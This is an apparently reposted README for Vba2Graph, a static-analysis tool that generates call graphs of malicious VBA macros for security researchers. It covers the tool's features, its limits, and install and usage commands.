Vba2Graph: A tool for security researchers to Analysis of Malware.
Allows for quick analysis of malicious macros, and easy understanding of the execution flow.
It Generates a VBA call graph for easier analysis of malicious documents., developed by @MalwareCantFly
Features
- Keyword highlighting
- VBA Properties support
- External function declarion support
- Tricky macros with “_Change” execution triggers
- Fancy color schemes
Pros
✓ Pretty fast
✓ Works well on most malicious macros observed in the wild
Cons
✗ Static (dynamicaly resolved calls would not be recognized)
Examples
Example 1:
Trickbot downloader – utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.
Example 2:
Installation
Install oletools:
https://github.com/decalage2/oletools/wiki/Install
Install Python Requirements
pip install -r requirements.txt
Install Graphviz
For Windows
Install Graphviz msi:
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Add “dot.exe” to PATH env variable or just:
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin
For Mac
brew install graphviz
Ubuntu
sudo apt-get install graphviz
Arch
sudo pacman -S graphviz
Usage (All Platforms)
olevba malicious.doc | python vba2graph.py -c 1
python vba2graph.py -i olevba_output.bas -o output_folder
Output
You’ll get 3 folders in your output folder:
- png: the actual graph image you are looking for
- dot: the dot file which was used to create the graph image
- bas: the VBA functions code that was recognized by the script (for debugging)
Batch Processing
Mac/Linux:
batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs.
Deletes output dir. use with caution.
Download Vba2Graph
No comments: